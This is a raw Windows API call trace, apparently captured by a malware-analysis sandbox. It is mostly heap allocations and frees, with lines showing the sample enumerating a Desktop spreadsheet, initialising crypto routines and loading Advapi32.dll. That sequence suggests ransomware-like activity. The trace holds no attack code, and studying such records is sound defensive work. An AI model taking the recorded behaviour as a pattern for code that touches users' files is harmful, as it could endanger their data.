0x2e54b98 [0212.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0212.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0212.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0212.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0212.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0212.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0212.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0212.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0212.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0212.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0212.504] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0212.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0212.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0212.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0212.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0212.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0212.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0212.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0212.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0212.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0212.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0212.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0212.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0212.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0212.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0212.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0212.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0212.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0212.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0212.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0212.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0212.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0212.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0212.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0212.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0212.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0212.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0212.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0212.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0212.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0212.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0212.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0212.505] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0212.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0212.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0212.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0212.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0212.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0212.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0212.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0212.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0212.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0212.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0212.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0212.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0212.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0212.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0212.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0212.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0212.506] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0212.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0212.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0212.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0212.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0212.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0212.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0212.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0212.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0212.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0212.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0212.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0212.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0212.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0212.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0212.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0212.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0212.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0212.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0212.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0212.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0212.507] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/xwkMqwHw2FNJUh0.ods", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e0a13e0, ftCreationTime.dwHighDateTime=0x1d5ead3, ftLastAccessTime.dwLowDateTime=0x7c8450b0, ftLastAccessTime.dwHighDateTime=0x1d5edd9, ftLastWriteTime.dwLowDateTime=0x7c8450b0, ftLastWriteTime.dwHighDateTime=0x1d5edd9, nFileSizeHigh=0x0, nFileSizeLow=0x1893, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="xwkMqwHw2FNJUh0.ods", cAlternateFileName="XWKMQW~1.ODS")) returned 0xa87050 [0212.507] FindClose (in: hFindFile=0xa87050 | out: hFindFile=0xa87050) returned 1 [0212.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0212.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0212.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0212.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0212.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0212.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0212.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0212.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0212.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0212.508] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0212.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0212.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0212.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0212.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0212.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0212.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0212.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0212.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0212.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0212.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0212.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0212.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0212.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0212.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0212.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0212.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0212.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0212.509] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0212.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0212.509] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0212.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0212.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0212.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0212.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0212.509] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0212.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0212.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0212.509] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0212.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0212.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0212.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0212.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0212.513] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0212.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0212.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0212.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0212.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0212.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0212.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0212.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0212.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0212.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0212.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0212.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0212.513] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0212.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0212.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0212.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0212.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0212.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0212.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0212.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0212.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0212.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0212.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0212.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0212.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0212.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0212.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0212.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0212.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0212.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0212.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0212.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0212.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0212.514] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0212.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0212.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0212.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0212.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0212.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0212.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0212.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0212.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0212.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0212.515] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0212.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0212.515] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0212.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0212.515] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0212.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0212.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0212.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0212.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0212.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0212.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0212.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0212.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0212.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0212.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0212.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0212.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0212.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0212.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0212.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0212.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0212.522] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0212.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0212.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0212.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0212.522] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0212.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0212.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0212.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0212.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0212.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0212.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0212.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0212.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0212.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0212.522] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0212.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0212.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0212.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0212.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0212.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0212.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0212.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0212.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0212.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0212.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0212.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0212.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0212.523] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0212.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0212.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0212.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0212.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0212.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0212.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0212.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0212.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0212.535] PeekMessageW (in: lpMsg=0x8cf4a8, 